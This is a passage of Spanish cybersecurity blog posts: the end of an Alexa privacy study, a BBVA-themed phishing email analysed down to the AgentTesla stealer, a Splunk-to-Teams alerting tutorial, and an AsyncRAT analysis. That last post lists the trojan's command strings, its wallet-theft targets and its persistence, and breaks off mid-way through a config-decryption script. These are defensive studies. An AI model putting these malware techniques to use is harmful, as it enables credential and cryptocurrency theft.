... El .csv nos revela un 0,45% de datos no remitidos , pero ahora vamos a lo mas alarmante: Dentro de esta muestra, Amazon nos traslada que nos ha identificado correctamente y aun asi, no remite el audio [Imagen: Audios identificados] Donde, de esos 59 de 12992 , disponemos de un total 14 ( 23%) en los que Amazon me identificó correctamente, pero no remite ni la transcripción ni datos a mayores. ¿ Por qué Amazon ? . En este punto, es posible que penséis ¿ Como que te identifico ? . Sencillo, en el proceso de configuración del asistente , nos remite una serie de preguntas, con el fin de identificar nuestra voz, para posteriormente identificarnos. [Imagen: Identificación de Alexa] También esto me suscita muchas preguntas, si el sistema es capaz de identificarnos , ¿ Por que graba y almacena a todo el mundo ?¿ No solo debería almacenar mis audios ya que soy yo el que doy el consentimiento ? ¿ No podría identificarse esto como poner una cámara y grabar a la calle ? Por otro lado , también tenemos sesiones de audios sin datos: [Imagen: Audios sin información] Sobre el que podemos encontrarnos audios con varios segundos de escucha, como el de este caso, sin activación del nombre Alexa , o que pudiese generarle algún tipo de confusión al asistente. Es normal que no transcriba lo que se dice o quien lo dice, pero si debería estar la identificación de fechas, como si vemos en algunos casos ( 3 ). Principalmente , casi todos estos casos , son segundos de escuchas, en lo que en algunos audios, podemos identificar a alguien, y en otros muchos ( la mayoría ), simplemente Alexa recoge muestras sin activación: > Pero, ¿ Podríamos determinar que solo con esto Alexa nos espía en nuestro teletrabajo ? . Tras analizar un gran numero de audios, principalmente buscando en las transcripciones, el trabajo consistió en buscar todo aquello que no debiese estar. Quitar audios que contengan en la transcripción palabras como Alexa, lampara , apaga , enciende ... ya que diría que es el principal uso que doy al asistente, ademas de escuchar Spotify. Esto me hizo llegar a algunos audios importantes, en los que algunos eran de las propias reunione, donde se identifica mi voz perfectamente , donde ademas, no se dice ni de una forma aproximada, la palabra de activación. Os voy a poner un ejemplo. En este caso , el audio y la transcripción esta sesgada con el fin de no exponer información, pero donde queda muy claro que es una reunión , en el que se tocan temas como contrataciones , o figuras importantes como la del CISO (1 ). [Imagen: Audio cortado Alexa espia] En concreto, he eliminado por mi parte la selección que os marco en el cuadro de arriba, y en la que podéis ver que si tiene audio: [Imagen: Audio sin eliminar] Grabación realizada un Miércoles a las 10:30 de la Mañana: [Imagen: Grabación Teletrabajo] Es por ello, que vereis en la grabación el mismo corte identificado. No cortes, os animo a escucharlo hasta el final: ## Conclusiones y que hacer al respecto Por el último de los audios , esta claro que , aunque no en gran medida, Amazon con su Alexa, puede almacenar datos ciertamente delicados. Y ya no solo eso, si no que , podría no llegar a guardarlos, pero si escucharnos premeditadamente . El o un tercero, que quisiese hacer un ataque dirigido. Por ello, creo que lo primero que las organizaciones deben hacer, es concienciar sobre el uso de estos dispositivos , trasladando esta recomendación a las políticas y normativas de seguridad, ya que como veis , las medidas de seguridad, deberían ir más allá del simple puesto de trabajo o el móvil que usemos. Por mi parte, ya no solo poner el mute ( sobre el que tengo ciertas sospechas que lo mismo no funcionaria ) , si no que cambiare por un altavoz bueno mi actual Alexa Echo. Pero, aparte de esto, que más podemos hacer: ## Evitar que Alexa almacene nuestros audios Para evitarlo, y así proteger tu privacidad y evitar la acumulación de grabaciones de voz ( No lo dije a lo largo del post, pero tiene audios míos desde 2019 ), Amazon ofrece la posibilidad de desactivar la función de almacenamiento de audios por Alexa. - Accede a la página de Amazon y dirígete a la sección ‘Mi cuenta’. - Localiza la categoría ‘Contenido digital y dispositivos’ y selecciona ‘Dispositivos’. [Imagen: Dispositivos Alexa] - El sistema solicitará que ingreses nuevamente tu contraseña para verificar tu identidad. - En el área de privacidad, haz clic en ‘Privacidad de Alexa’. [Imagen: Menú desplegable de Amazon mostrando la opción Privacidad de Alexa resaltada] - Elige ‘Administrar datos de Alexa’. - Dentro de ‘Grabaciones de voz’, haz clic en la flecha de ‘Elegir cuánto tiempo se guardarán las grabaciones de voz’. [Imagen: No guardar los datos ni grabaciones de Alexa] - Finalmente, activa la opción ‘No guardar ninguna grabación de voz’. Esta acción no solo eliminará cualquier audio previamente almacenado sino que también evitará futuras grabaciones. [Imagen: Página de Amazon para configurar Alexa y no guardar las grabaciones de voz] Parece que de momento estaremos algo tranquilos, pero revisaremos si esto es asi. Una prueba que también quiero hacer, es mantener el micro desactivado en el Alexa un mes, y ver si en ese mes, se grabo algún audio concreto. Lo que esta claro, es que nuestra privacidad esta más expuesta en cada momento.En este post , me he centrado en Alexa, al ser el elemento sobre el que trabajaba, pero ... ¿pasará lo mismo con google? Espero que os gustase el análisis, y que con esto, valoreis, opciones de uso y opciones de incluir en vuestras políticas y normativas una referencia al uso de este tipo de dispositivos. --- # BBVA no te enviará estos correos adjuntos URL: https://ciberseguridad.blog/bbva-no-te-enviara-estos-correos-adjuntos/ Tipo: Artículo Autor: Rafa.Pedrero Publicado: 2024-03-17 Actualizado: 2026-10-04 Tema: Herramientas para hackear > Análisis revelador de un correo de "BBVA" con el malware AGentTesla. No siempre las sandbox aciertan. ¡ CUIDADO ! Hola a tod@s!! Me ha llamado este malware la atención debido a quién tratan de suplantar y que Any.run no le ha puesto nombre al malware, así que saldremos de dudas, ¿será alguno que hemos visto recientemente? : Any.run [Imagen: Comprobante de pago Any.Run Malware] Vamos a ver el aspecto del correo y el adjunto que trae: [Imagen: Malware Adjunto BBVA] Ya por el dominio nos debería hacer sospechar, este correo no procede del BBVA. Y tiene un fichero adjunto en formato Excel. Oleid nos avisa que tiene macros. [Imagen: Oleid , ficheros con macros] Y Olevba nos dice que tiene cadenas hexadecimal sospechosas: [Imagen: Olevba Cadenas sospechosas] > Hay que desconfiar, sobre todo si descarga algo como esto, un nombre demasiado largo. xD [Imagen: Nombre de fichero muy largo] Este fichero no es un doc sino un rtf y Any.run da en el clavo con el exploit que utiliza: cve-2017-11882. Un indicador de esto sería la aparición del proceso EQNEDT32.EXE, como se ve en el árbol de procesos. Vemos como se ha descargado un fichero vbs. [Imagen: Proceso EQNEDT32] Si editamos el mismo y realizamos una serie de modificaciones al final, podemos ver la URL desde donde descarga algo: [Imagen: Ejecuta VBS] Un fichero vbs, este sería su contenido: [Imagen: Contenido VBS del malware] Cogemos Cyberchef y hacemos lo mismo que indica el comando powershell. [Imagen: Cyberchef y el análisis de malware] Tenemos un par de imágenes (son la misma imagen en 2 url diferentes): [Imagen: Imágenes del malware] Esta imagen guarda código base64 en su interior. [Imagen: Incrustar código en la imagen de un malware] Una vez extraído tendremos el malware final, pero antes, hablaremos de la url que se encontraba al revés, al igual que su contenido codificado en base64, todo al revés. Esta es una DLL que pondrá en memoria el otro artefacto, el malware final, no pisará disco por lo que será más difícil detectarlo. [Imagen: DLL en memoria , sin pisar disco] Y llegamos al malware final y que todos estábamos esperando, se trata de… el stealer ¡AgentTesla! del que ya hablamos . Me voy directo a la configuración, si queréis ver más información sobre las acciones que realiza, podéis verlas en el enlace anterior. [Imagen: AgentTesla Malware BBVA] Es raro que Any.run no diga el tipo de malware que es, se ha quedado en alguno de los pasos y no ha podido extraer el malware Agenttesla y eso que se suele equivocar poco y menos en estos casos, pero como veis, no siempre se ejecuta todo correctamente en una sandbox. Espero que os haya gustado el post y tened cuidado con este tipo de correos, si el dominio no tiene relación con el banco del que procede, desconfiad. Si trae algún adjunto, desconfiad, los bancos no envían este tipo de ficheros por correo. Como está muy de moda usar ChatGPT, aquí tenéis algunos consejos o recomendaciones para prevenir el phishing de correos con adjuntos: 1. Sé escéptico con los correos electrónicos y mensajes sospechosos: Los correos electrónicos o mensajes que solicitan información personal, financiera o de inicio de sesión son a menudo intentos de phishing. Verifica siempre la autenticidad de estos mensajes antes de responder. 2. No hagas clic en enlaces o descargues archivos de fuentes desconocidas: Los enlaces en correos electrónicos o mensajes pueden dirigirte a sitios web falsos diseñados para robar tu información. Si tienes dudas sobre la legitimidad de un enlace, visita el sitio web oficial directamente introduciendo la URL en tu navegador. 3. Verifica la URL del sitio web: Asegúrate de que estás en un sitio web legítimo verificando la URL en la barra de direcciones de tu navegador. Los sitios de phishing pueden tener URLs que se parecen a las de sitios legítimos, pero con pequeñas diferencias. 4. Busca señales de seguridad en los sitios web: Antes de ingresar información personal o financiera en un sitio web, verifica que la URL comience con "https://" y busca el icono de un candado en la barra de direcciones, lo que indica una conexión segura. 5. Utiliza soluciones de seguridad: Mantén actualizado tu software de seguridad, como antivirus y firewall. Estas herramientas pueden ayudar a detectar y bloquear sitios web y descargas maliciosas. 6. Educación continua: Mantente informado sobre las últimas tácticas de phishing. Los estafadores siempre están buscando nuevas formas de engañar a las personas, por lo que es importante estar al tanto de las últimas técnicas de phishing y cómo evitarlas. 7. Usa la autenticación de dos factores (2FA): Incluso si un atacante obtiene tu contraseña, la autenticación de dos factores puede proporcionar una capa adicional de seguridad al requerir una segunda forma de verificación para acceder a tu cuenta. 8. Revise sus cuentas regularmente: Verifica tus cuentas bancarias y de tarjetas de crédito regularmente para detectar cualquier actividad inusual que podría indicar un fraude. 9. Educación a familiares y amigos: Comparte esta información con tus seres queridos, especialmente aquellos que pueden no estar tan familiarizados con las tecnologías digitales. Ayudarlos a entender cómo protegerse puede evitar que se conviertan en víctimas. Hacedle caso ;) ¡Hasta otra! --- # Splunt to Teams : Matando nuestro N1 de monitorización URL: https://ciberseguridad.blog/splunt-to-teams-matando-nuestro-n1-de-monitorizacion/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2024-03-10 Actualizado: 2026-10-08 Tema: Operaciones de Seguridad > Vitaminamos las alertas de Splunk y las publicamos en Teams mediante Adaptive Cards en Power Automate, potenciando la obtención de información. No todo en la vida es XSOAR. Por muy refinado y automatizado que tengamos el proceso , en muchos puntos tendremos que darle un toque "humano" a nuestros análisis de ciberseguridad. Pero si que es cierto que con una buena automatización y un poquito de magia creativa como la que vamos a ver , podemos llegar a optimizar los tiempos , bajar la fatiga por alertas y hacer unos análisis más rigurosos. En este proceso, he metido tres pequeños actores. El Splunk, actor principal , sobre el que podemos realizar gran parte del trabajo de nuestro actor secundario si quisiésemos. Microsoft Power Automate , como actor secundario y el cual nos ayudara a extandarizar el proceso. Y el Teams , como actor debutante , que tal vez no asociemos a nuestros procesos de monitorización , pero que tras este trabajo post , vais a empezar a verlo con otros ojos, después de que hablemos de las Adaptive Cards. Empecemos esta película .. ## Alertas de Splunk a Teams Aqui es donde empieza la magia . Podemos enviar alertas de Splunk a Microsoft Teams creando un webhook en Teams y luego configurando Splunk para enviar solicitudes de webhook a esa URL. Disponemos de multiples plugins para ello. En mi opinión uno de los que mas me gusta es este que permite el envío de cabeceras , lo que nos dará flexibilidad más allá de Teams, pero aqui al gusto. En este caso, remitirá el JSON de la alerta via Webhook y ya será Teams y Power Automate , quien procese cómo lo vamos a pintar. - Cramos un webhook en Microsoft Teams yendo a la aplicación Teams. Posicionándonos en el canal que queramos remitir las alertas, hacemos clic en el botón "..." (botón de menú) y selecionamos "Manage Channel". [Imagen: Opciones de canal de Microsoft Teams] Una vez dentro, tenemos que buscar los conectores . Donde posteriormente crearemos un webhooks : [Imagen: Conectores Canal de Teams] Ya estamos en disposición de crear un conector de Webhook: [Imagen: Configurar Webhook en Microsoft Teams] - Ya tenemos nuestros webhook generado. Copia la url , ya que la necesitaremos más adelante. [Imagen: Configuración de un conector de webhook entrante de Microsoft Teams para alertas] - Crea una nueva alerta en Splunk usando el Administrador de Alertas. En la pestaña Acciones, seleccione Webhook como tipo de acción. [Imagen: Crear Alerta Webhook Splunk] - En el campo URL de Webhook, necesitaremos la URL anterior generada en Splunk. - Si no nos manejamos con algunas app de Webhook, podemos crear un script de Python que formatee los datos de alerta de Splunk y los envíe al webhook de Teams. El formato con el que recibe Microsoft Teams la alerta es esencial. Y sobre lo que más hemos sufrido hasta llegar al final del post. ``` importar json solicitudes de importación def send_alert_to_teams(alert_payload): teams_webhook_url = "https://outlook.office.com/webhook/our_webhook_url" datos = { "título": "Alerta de splunk", "texto": json.dumps(alert_payload, indent=4) } requests.post(teams_webhook_url, json=data) ``` - En el campo Script de la acción Webhook, introduzca la ruta de acceso a nuestro script Python y el nombre de la función como script:send_alert_to_teams - Guardemos nuestra alerta y la probemos para asegurarnos de que funciona correctamente y enviando alertas al canal correcto en Teams. Como podeis ver en el curl, tenemos que hacer un formateo especifico para poder mandar mensajes a Teams. Algo super, super potente , que nos hará vitaminar nuestras alertas, creando Adaptatives Cards que nos facilitaran mucho el análisis y nos pintaran la información de una forma mejor que directamente de la alerta de Splunk. Una cosa que no entrare pero que tenéis que tener en cuenta , es si tenéis Proxy en vuestra organización, no os preocupéis , disponéis de mucha información al respecto. Podemos por ejemplo , probar el webhook sin pasar por Splunk de esta forma ( Cambiar por vuestro Webhook ) : ``` curl -X POST "https://XXXXXXXXX.webhook.office.com/webhookb2/4c639d40-35ff-XXXXXXX-78b8aa407b77@9744600e-XXXXXX-baa1-25ec245c6f10/IncomingWebhook/7df201726eabXXXXXXXX48c0/620dc992-6313-4f1f-a6bd-146a30dXXXXXX" \ -H "Accept: application/json" \ -H "Content-Type: application/json" \ -d '{ "type": "message", "attachments": [ { "contentType": "application/vnd.microsoft.card.adaptive", "content": { "type": "AdaptiveCard", "body": [ { "type": "TextBlock", "text": "CIBERSEGURIDAD .blog .... Probando 1,2,.. " } ], "$schema": "http://adaptivecards.io/schemas/adaptive-card.json", "version": "1.0" } } ] }' ``` ## Vitaminando las alertas de Splunk que llegan a Teams La idea, es poner mucho más fácil el análisis a nuestros N2 , ya que como decíamos , nos vamos a encargar de todo el trabajo que hacían los N1 , y pondremos la información de una forma mucho mejor y más visual. No todas las organizaciones disponen de un XSOAR, que en este caso podría hacer el trabajo que nos va ha hacer nuestro power automate , o no todas tampoco pueden permitirse pagarse un API de Virustotal con el que podamos traernos el Score de la url o ip directamente. Mi objetivo es adaptar a las distintas organizaciones en la busqueda de procesos refinados de ciberseguridad, y estoy seguro que este proceso puede ser muy útil, incluso en organizaciones on una alta automatización, XSOAR, etc ... Si nosotros remitimos directamente la alerta a Teams , nos vamos a encontrar en nuestro canal de alertas , algo así : [Imagen: Alerta de Splunk en Teams sin modificar] Una alerta via tarjeta , que nos dará la opción de buscar en Splunk , y donde para ver el detalle completo del JSON en bruto, tendremos que darle a "Mostrar más" , disponiendo de información en bruto de la alerta: [Imagen: Alerta en bruto de Splunk] Pero no es esto lo que queremos , por lo que vamos a procesar este JSON en bruto que nos manda Splunk, pasándolo por Power Automate , con el fin de "poner más bonito" nuestro proceso, donde , tras recibir el mensaje ( tampoco queremos perdernos información ) , contestaremos con otro mensaje procesando la información. ## Vitaminando la alerta de Splunk en Teams con Power Automate Empezaremos con el primero de los pasos en Power Automate. Ya estamos recibiendo via Webhook los mensajes en nuestro grupo de Teams. Por lo que ahora lo que nos interesa es potenciar lo que ya tenemos . Para ello, empezaremos en Power Automate , leyendo los mensajes que nos llegan al canal: [Imagen: Leer mensajes nuevos en Teams via Power Automate] La flecha no me quedo muy fina ;) , pero funcionara como un Trigger ( Gatillo ) , empezara cuando reciba un nuevo mensaje , en el que le indicaremos de donde debe "beber" la información: [Imagen: Análisis de mensaje en el canal] Indicando que debe coger el cuerpo del mensaje , si no estáis familiarizados con Power Automate, podréis observar que en un mismo mensaje , recibimos mucha información, que nos servirá desde crear un nuevo mensaje con información que nos traemos del inicial, como es nuestro caso, hasta contestar sobre este ( trayéndonos por ejemplo el ID de mensaje ). Por ello, en a segunda caja , debemos traer el cuerpo del mensaje , y pasear el JSON, con el fin de obtener la información que nos interese: [Imagen: Obtención del cuerpo mensaje en el Análisis del archivo JSON] Hablaremos más tarde del recueadro que pone abajo ( Schema ) , pero para ello, tenemos que entender , que información en concreto nos llega a un mensaje de la alerta, y para ello, el JSON literal de la alerta de SPLUNK que estamos tratando : ``` { "lastrow": true, "preview": false, "result": { "cdu": "TIP-001: Comunicación+Permitida+saliente+IOC+hacia+IP", "_time": "2024-01-07T17:19:58.000+01:00", "agent_type_id": "splunk", "alarm_category": "SIEMcategory", "Day": "07-01-2024", "event_type_id": "TIP-001: Comunicación permitida saliente IOC hacia IP", "events": [ "{\"src_ip\":\"31.170.121.238\",\"dst_ip\":\"10.100.4.98\",\"timestamp\":1709800054000}", "{\"src_ip\":\"31.170.121.238\",\"dst_ip\":\"10.100.4.98\",\"timestamp\":1709800058000}" ], "extensions": "{\"ambit\":\"Global\",\"country\":\"España\",\"mon_soc\":\"False\",\"tactic\":\"Credential Access\",\"techniques\":\"T1110.001\",\"technology\":\"Palo Alto\"}", "dst_ip": "31.170.121.238", "src_ip": "10.100.4.98", "Hour": "14", "Minute": "19", "name": "TIP-001: Comunicación permitida saliente IOC hacia IP '31.170.121.238'", "native_alarm_id": "naid81336088", "num_events": "12", "product": "Security", "product_category": "Windows", "risk": "9", "sc": "rubenramiro.splunkcloud.com", "security-alarm": "{\"src_ip\":\"31.170.121.238\",\"dst_ip\":\"10.100.4.98\",\"timestamp\":1709800054000}", "severity": "Critical", "siem_id": "ES_RUBEN.RAMIRO_SPLUNK", "siem_type_id": "splunk", "Time": "1709828398", "timestamp": "1709828398000", "vendor": "Palo Alto", "WeekDay": "4" } } ``` Podríamos desgranar la información mas detalladamente, pero para entenderlo, es más que valido. Esta es la alerta real que recibimos , y sobre la cual, nuestro paseador de JSON de Power Automate debe entender. Es aqui donde entra este recuadro que os indico, con el fin de que Power Automate y el paseador entiendan que es lo que se le esta pasando. Para ello, con una alerta real como esta, simplemente la pegamos , con el fin de que se genere el Schema: [Imagen: Generador de Schema JSON] Esto nos generara el Schema de forma automática. ``` { "type": "object", "properties": { "lastrow": { "type": "boolean" }, "preview": { "type": "boolean" }, "result": { "type": "object", "properties": { "cdu": { "type": "string" }, "_time": { "type": "string" }, "agent_type_id": { "type": "string" }, "alarm_category": { "type": "string" }, "Day": { "type": "string" }, "event_type_id": { "type": "string" }, "events": { "type": "array", "items": { "type": "string" } }, "extensions": { "type": "string" }, "dst_ip": { "type": "string" }, "src_ip": { "type": "string" }, "Hour": { "type": "string" }, "Minute": { "type": "string" }, "name": { "type": "string" }, "native_alarm_id": { "type": "string" }, "num_events": { "type": "string" }, "product": { "type": "string" }, "product_category": { "type": "string" }, "risk": { "type": "string" }, "sc": { "type": "string" }, "security-alarm": { "type": "string" }, "severity": { "type": "string" }, "siem_id": { "type": "string" }, "siem_type_id": { "type": "string" }, "Time": { "type": "string" }, "timestamp": { "type": "string" }, "vendor": { "type": "string" }, "WeekDay": { "type": "string" } } } } } ``` Con ello, y puesto que ta tenemos desgranado la información que vamos a recibir , podemos proseguir. En nuestro caso, ya que tenemos multiples casos de uso en nuestro SIEM, vamos a tratar cada uno de una forma, por lo que controlamos con una condición nuestro CDU ( Caso De Uso) , en caso de que no se cumpla , no ejecuta nada. De esta forma, saltara el Power Automate concreto. Teniendo N automatismos por cada CDU. > En este caso TIP-001 , se trata de una detección de tráfico saliente permitido hacia una IP categorizada como maliciosa. [Imagen: Condición caso de uso] Por ello: Nos gustaría , extraer dichas direcciones de origen y fin , analizarlas en distintas herramientas y ejecutar manualmente en caso de ser positiva lo más rápido posible. Recordamos que abrá casos que estemos 100% seguros del bloqueo y podamos automatizar el bloqueo de forma automática , y otros en los que no lo estemos tanto, como puede ser este caso, y necesitemos hacer un triaje anterior. Os mostrar el resultado que vamos a obtener, con el fin de sea más fácil hacernos una idea: [Imagen: Magia entre Splunk y Microsoft Teams] Como podéis ver, esto ya esta más en lenguaje humano. 1. Traemos la información esencial 2. Los enlaces del Análisis, llevan directamente al propio análisis de la IP. ( Somos pobres y no tenemos API de pago ) 3. En el resultado , muestro un curl de bloqueo directamente sobre un feed de Minemeld, con comentarios personalizados de la alerta ( Copiar y pegar ). > Solo con esto, podemos reducir los tiempos de análisis de nuestros analistas al 50% ## De Splunk a tarjetas Adaptadas del Teams El resultado, como veis , es muy chulo, aunque llegar hasta aquí sin saber cómo , me llevo bastante tiempo, por la inexperiencia de trabajar con las tarjetas Adaptativas o Adaptative Cards . Pero todo cambio cuando descubrí el Diseñador de Tarjetas , ya no sólo para Teams ;) ... voy a estudiar algo para el correo. [Imagen: Diseñador tarjetas Microsoft Teams] El diseñador de tarjetas, nos dará de forma sencilla, un JSON de nuestro formato ( En este caso , 212 lineas de JSON ) , que ignorante de mi, me empece a picar a mano en un principio, y que nos dejará poner en nuestra tarjeta de Microsoft Teams: [Imagen: Tarjeta Adaptativa para Microsoft Teams] De esta forma , y puesto que tenemos todos los datos parseados del JSON de forma individual, podemos poner la información , o podemos generar los botones como el de VirusTotal, por su estructura de URL mediante contenido dinámico: ``` https://www.virustotal.com/gui/ip-address/31.170.121.238 ``` [Imagen: Insertar contenido dinámico de Splink en JSON de Teams] Disponiendo de dicho campo en dst_ip ( esta estructura se cumple en todos los sites indicados ): [Imagen: Campo dst_ip para formar la URL a consultar] Cómo resultado, ya lo hemos visto, somos capaces de ver de una forma ágil la información , y ejecutar muy rápidamente en caso de que esta sea positiva una acción: [Imagen: Tarjeta adaptativa de Teams con una alerta de IOC crítica y comandos de bloqueo] Clickar en los propios enlaces nos llevara directamente a la información , ahorrando tiempo. [Imagen: Página de VirusTotal mostrando 4 de 91 motores marcando la IP como maliciosa] > Y como todos sabemos , el tiempo es dinero : Generando eficiencias mientras somos más seguros Espero que disfrutaseis el post , tanto como lo disfruto yo trayéndoos cosas nuevas que os pueden ser muy útiles . --- # Analizando y detectando el troyano AsyncRAT URL: https://ciberseguridad.blog/analizando-y-detectando-el-troyano-asyncrat/ Tipo: Artículo Autor: Rafa.Pedrero Publicado: 2024-02-19 Actualizado: 2026-10-04 Tema: Herramientas para hackear > Análisis del troyano AsyncRAT: Descubre cómo detectar y protegerte contra este malware que te robará los bitcoins de tu Wallet Hola a tod@s!! Me gustaría ir viendo una serie de malware que suelen estar en el TOP 10 en todos los ranking sobre troyanos, stealers, ransomware, etc. Para que podamos ir viendo su comportamiento y como podríamos detectarlos para que no nos hagan tanto daño. Hoy le ha tocado al troyano AsyncRAT, pero antes, hagamos un repaso. > AsyncRAT es un RAT que puede monitorizar y controlar remotamente sistemas infectados. Este malware fue introducido en Github como un software legítimo de administración remota de código abierto, pero los hackers lo utilizan por sus muchas funciones poderosas maliciosas. Siempre me gusta encontrar anomalías, o detecciones de algo que, a priori, no sé de qué se trata como este caso, esto : [Imagen: Anyrun AsyncRAT] ¿Que será, será? Abrimos ese fichero 7zip y nos encontramos con 2 ficheros: [Imagen: Ficheros AsyncRAT] El primero es un correo en formato MSG (para abrirlo con Microsoft Outlook) y el segundo, es un directorio con una serie de binarios dentro. [Imagen: Ficheros maliciosos en formato MSG] Por lo que intuyo que en ese correo vendrá ese zip o bien un enlace para su descarga, vamos a verlo. [Imagen: Email con malware] No se aprecia bien en la imagen, pero es un enlace para la descarga del fichero: [Imagen: Enlace de descarga del malware en el mail] Una vez descargado solicita la contraseña que aparece en el mismo correo, por lo que si logras hacerte con un fichero como esos, no podrás acceder a su contenido a no ser que conozcas la contraseña, un primer paso para que no pueda ser analizado directamente, no lo iban a poner fácil, no. Pasamos al fichero que en el zip que veíamos en Any.run ya estaba generado sin la contraseña. Una prueba que me gusta hacer para identificar si el malware es el EXE o alguna de las DLL es ejecutar primero el EXE quitándoles las DLL de la ruta y veo si se ejecuta bien, vemos como en este caso no lo hace. Para ello, abres Procmon y ves su comportamiento. Puedes jugar con el filtro de “Path ends with .dll” y así puedes comprobar cuáles va a necesitar cargar ya que las irá buscando una a una. [Imagen: Ejecución de EXE sin DLLs] Esto no quiere decir que el malware se esconde en esa DLL sino que es necesaria para su ejecución. Dicho esto, tenemos 3 DLL y alguna de ellas será el malware, ¿Cuál será? Veamos que nos dice herramientas como PEStudio. [Imagen: Certificado inválido para Malware] El certificado para esa DLL no es válido, entonces la DLL maliciosa sería asus_wmi.dll. Pues vamos ajecutarlo todo (el EXE cargará esta DLL, técnica de Mitre DLL Sideloading) y ver qué hace. Para ello, usaremos API Monitor. [Imagen: ASUS WMI DLL Malware] Bien, tenemos un buen comienzo, obtiene la ruta del EXE, accede a un fichero llamado aboriginal.raw, carga una serie de direcciones que obtiene para las API LoadLibraryA y VirtualProtect y las llama para ejecutar el contenido de ese fichero con permisos de ejecución. Hagamos una pausa, ¿donde está esto dentro de la DLL? [Imagen: API LoadLibraryA y VirtualProtect] Se identifica todo esto en el código, salvo lo que va necesitando, eso no se ve tan claramente, para eso está el análisis dinámico. A la izquierda de la imagen, dinámico, a la derecha el estático. El dinámico está para ayudar al estático, no siempre se ve tan claro y es necesario, uno y otro. Si guardáis el resultado de Procmon en CSV y utilizáis ProcDOT, veréis a modo de gráfico el comportamiento del malware, ayuda en muchas ocasiones a detectar cosas que de otra forma no veríais. [Imagen: PROCDOT Ataraxia.db] Vemos como además del fichero mencionado antes, hace uso del otro, ataraxia.db. Después de eso aparece un nuevo proceso, cmd.exe y después otro, MSBuild.exe en donde parece que acaba todo, bueno, eso de que acaba… más bien empieza, me da a mí ;) [Imagen: CMD Malware] El malware se copia a un directorio de %APPDATA%. [Imagen: Copia de Ataraxiadb a AppData] Para futuras ejecuciones, y es importante que estén todos los ficheros, para que funcione, si elimináis alguno no lo hará, sobre todo el .raw y .db. El troyano AsyncRAT se encuentra inyectado en MSBuild.exe, por lo que se puede extraer con Hollows_hunter: [Imagen: Extracción de Hollower_Hunter32] Miramos que ha extraído, un binario compilado con .Net : [Imagen: Extraccion de binario malicioso en .NET] ¿Es antiguo? [Imagen: Fecha de DLL Maliciosa] Según la fecha de compilación lo es, de 2013. Pero no nos lo creemos, ¿verdad? Esta fecha se puede alterar fácilmente con un editor hexadecimal o multitud de utilidades. Lo abrimos con DnSpy y accedemos al punto de entrada (EntryPoint). [Imagen: EntryPoint DnSSpy] Podemos observar como tiene algo de ofuscación, ya sólo queda ir función a función analizando el comportamiento. [Imagen: Ofuscación de Malware ASYNCRAT] Vemos los comandos recibidos desde el servidor para ir realizando las diferentes acciones. ``` $ grep evUbXPfeFYDN NdAbYmwfcczrL/BvbAjsokTpB.cs | grep "==" | awk -F\" '{print $2}'| sort -u anydesk Avast backproxy Block Chrome DicordTokens Dll Fox getscreen gettxt KillProxy killps klget Net35 passload plugin pong ResetHosts ResetScale savePlugin setxt uacoff Wallets WDExclusion WebBrowserPass weburl ``` Vemos como lee el fichero relacionado con las capturas de teclas realizadas por el usuario Log.tmp en el directorio temporal o como desactiva el Antivirus Avast en caso de tenerlo instalado, estos son sólo unos ejemplos de lo que hace esa función. [Imagen: Captura de datos del malware.] Trata de detectar que se ejecuta en entorno de Máquina Virtual. [Imagen: El malware busca si es ejecutado en una maquina virtual] O en entorno de Sandboxie: [Imagen: Busqueda de Sandbox por parte del malware] Comprueba que el tamaño del disco no sea menor a ese valor que vemos y que el SSOO no sea un Windows XP. [Imagen: Malware XP , busqueda del SSOO y tamaño de disco] La persistencia la crea con la clave de Registro en SOFTWARE\Microsoft\Windows\CurrentVersion\Run, dependiendo de los permisos. [Imagen: Persistencia en el registro] > Después de obtener información básica sobre el usuario y el entorno en donde se ejecuta, obtiene información de los navegadores o wallets que exfiltrará posteriormente al Command and Control. [Imagen: Exfiltración de información por parte del malware] ``` $ grep -R zIdwWubRehYnG.NbofEcUcoMbVs VyjkTQqEiFxBtz/IUCayWVdAJWWCoh.cs | grep -v False | awk -F\" '{print $2}' Packet HWID User Path Admin Performance Pastebin Antivirus Meta_Firefox Meta_Chrome Meta_Brave Meta_Edge Meta_Opera Meta_OperaGX Phantom_Chrome Phantom_Brave Binance_Chrome Binance_Edge TronLinkChrome BitKeep_Chrome Coinbase_Chrome Ronin_Chrome Trust_Chrome BitPay_Chrome F2a_Chrome F2a_Brave F2a_Edge Ergo_Wallet Ledger_Live Atomic Exodus Electrum Coinomi Binance Bitcoin_Core Pong Group BoolWallets LastTime ``` La configuración se encuentra cifrada dentro del malware. [Imagen: Robo de credenciales por parte del Malware] He visto algún POST en donde descifran esta configuración con Cyberchef. Me decanté por un script que veremos a continuación, pero antes, os pongo una captura de como se vería esto sin ofuscar: [Imagen: Script sin ofuscar] Según esta captura, vemos como se encuentra el puerto, los hosts, versión, clave, etc. En la versión ofuscada sigue el mismo orden, por lo que habría que ir copiando y pegando según están, ¿en donde? En el siguiente script. ``` # Script by https://eln0ty.github.io/malware%20analysis/asyncRAT/ # 1) use PBKDF2 to derive the decryption key and initialization key used for sha # 2) calculate sha256 of data[32:] and compare it to the embedded sha256 hash (data[:32]) (We don't care here) # 3) iv = data[32:48] # 4) aes_dec(key, iv, data[48:]) # pip install backports.pbkdf2 # pip install malduck from backports.pbkdf2 import pbkdf2_hmac from base64 import b64decode from malduck import aes, unpad # Salt = Encoding.ASCII.GetBytes("DcRatByqwqdanchun"); grep Rfc2898DeriveBytes salt = b"\xbf\xeb\x1e\x56\xfb\xcd\x97\x3b\xb2\x19\x02\x24\x30\xa5\x78\x43\x00\x3d\x56\x44\xd2\x1e\x62\xb9\xd4\xf1\x80\xe7\xe6\xc3\x39\x41" key = b"NHl0bXdDMHJYeVFXdURXTkpLS3NZNXJmcjBzQk9nTGg=" config = { "Ports": "qgsqILrZwGyelGsL2vBeptcpNvBNTOF+JsgPcvnhUxPJln9whxhVAg1fXXl1eVWI1VXifNJXVZI+QaDOtKFQZA==", "Hosts": "ttKCei2wakddmH5v5fkeZbFsAbcmhDXNbTRhQlVl5bO2ALb8Y0pjGvj2BRh2mTubuwW+lga3xbnXRsMq5O+En8XRqvF881XmRKShJCidqQY=", "Version": "3Dmrz3b8n924yMvtBIriKPnY5AeI5XLFDSy54U9QXAiF52cekLDya7rwJaFJMpOzOHuhHOwNbffaaKQ6H33Q3d8t1xVEoDhckJXPSpeF+C4=", "Install": "mQLkvODFxhIDROCJMN2M3xBk1w57Tve67UTMSQ4tKq+L3sZ+n75ghmugJo17bYpVX/ZEqP5W/KYEoGXeWE3/hw==", "MTX": 